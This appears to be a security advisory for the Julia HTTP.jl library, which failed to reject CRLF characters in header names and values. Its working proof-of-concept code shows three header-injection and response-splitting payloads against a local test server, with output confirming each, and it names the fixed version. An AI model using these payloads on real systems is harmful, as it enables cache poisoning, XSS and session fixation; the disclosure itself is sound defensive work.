PT-2025-46011 · Julia · Http
Published
2025-10-14
·
Updated
2025-10-14
None
No severity ratings or metrics are available. When they are, we'll update the corresponding info on the page.
HTTP.jl did not validate header names/values for illegal characters, allowing CRLF-based header injection and response splitting.
using HTTP, Sockets
function handle index(req::HTTP.Request)
@show HTTP.header(req, "X-Foo")
return HTTP.Response(200, "ok")
end
function handle redirect(req::HTTP.Request)
return HTTP.Response(301, ["Location" => get(HTTP.URIs.queryparams(req), "to", "/")], "redirect")
end
const router = HTTP.Router()
HTTP.register!(router, "GET", "/", handle index)
HTTP.register!(router, "GET", "/redirect", handle redirect)
server = HTTP.serve!(router, Sockets.IPv4(0,0,0,0), 8080)
println("[*] POC 1: Header injection in request through header key")
user input = "X-Custom: xr
X-Foo: Barr
X-Custom"
HTTP.get("http://localhost:8080/", [user input => "hello"])
println()
println("[*] POC 2: Header injection in request through header value")
user input = "hellor
X-Foo: Bar"
HTTP.get("http://localhost:8080/", ["X-Custom" => user input])
println()
println("[*] POC 3: Header injection in response through header value")
res = HTTP.get("http://localhost:8080/redirect?to=/%0d%0aX-Foo:%20Bar", redirect=false)
@show HTTP.header(res, "X-Foo")
Result
[ Info: Listening on: [0.0.0.0:8080](http://0.0.0.0:8080/), thread id: 1
[*] POC 1: Header injection in request through header key
HTTP.header(req, "X-Foo") = "Bar"
[*] POC 2: Header injection in request through header value
HTTP.header(req, "X-Foo") = "Bar"
[*] POC 3: Header injection in response through header value
HTTP.header(res, "X-Foo") = "Bar"Impact
This enables HTTP response splitting and header injection, leading to cache poisoning, XSS, session fixation, and more.
Patches
This issue is fixed in HTTP.jl
v1.10.19Credit
Chen T
Found an issue in the description? Have something to add? Feel free to write us 👾
Related Identifiers
Affected Products
Http